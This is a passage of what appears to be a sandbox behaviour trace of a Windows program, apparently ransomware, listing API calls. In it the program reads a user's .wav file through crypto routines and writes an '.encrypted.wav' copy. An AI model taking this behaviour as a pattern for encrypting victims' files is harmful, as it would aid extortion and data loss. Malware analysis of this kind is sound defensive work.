lpMsg=0x6ae83c) returned 0 [0038.778] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.778] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.778] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.778] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.778] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.778] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0038.779] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.779] CryptDestroyHash (hHash=0x7c2100) returned 1 [0038.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0038.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0038.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0038.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0038.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0038.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0038.779] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0038.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0038.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0038.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0038.779] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0038.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0038.779] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.779] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.779] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0038.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0038.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0038.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0038.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.780] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\y6ubt-qdhh8vkxog3x\\e6du.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.780] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.780] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0038.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0038.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0038.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0038.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.780] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0038.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0038.780] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0038.780] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0038.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0038.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0038.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0038.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0038.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0038.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0038.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0038.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0038.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0038.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0038.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0038.782] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\y6ubt-qdhh8vkxog3x")) returned 0x10 [0038.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0038.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0038.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0038.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.782] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.encrypted.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\y6ubt-qdhh8vkxog3x\\e6du.encrypted.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0038.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0038.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0038.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0038.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.783] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0038.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0038.783] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0038.783] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0038.783] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0038.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0038.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0038.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0038.784] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0038.784] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0038.786] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x60cd, lpOverlapped=0x0) returned 1 [0038.787] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0038.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x160cd) returned 0xac0018 [0038.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0038.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0038.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0038.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x160cd) returned 0x935008 [0038.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.789] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0038.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x160cd) returned 0xac0018 [0038.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0038.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.790] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0038.790] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.790] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0038.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0038.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0038.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0038.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0038.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x160cd) returned 0xac0018 [0038.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0038.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0038.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0038.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0038.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0038.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0038.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0038.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0038.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889610 [0038.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0038.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0038.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0038.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0038.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x160cd) returned 0x94b0e0 [0038.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0038.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0038.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0038.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0038.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0038.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0038.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0038.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0038.792] RtlAllocateHeap (HeapHandle=0x770000, 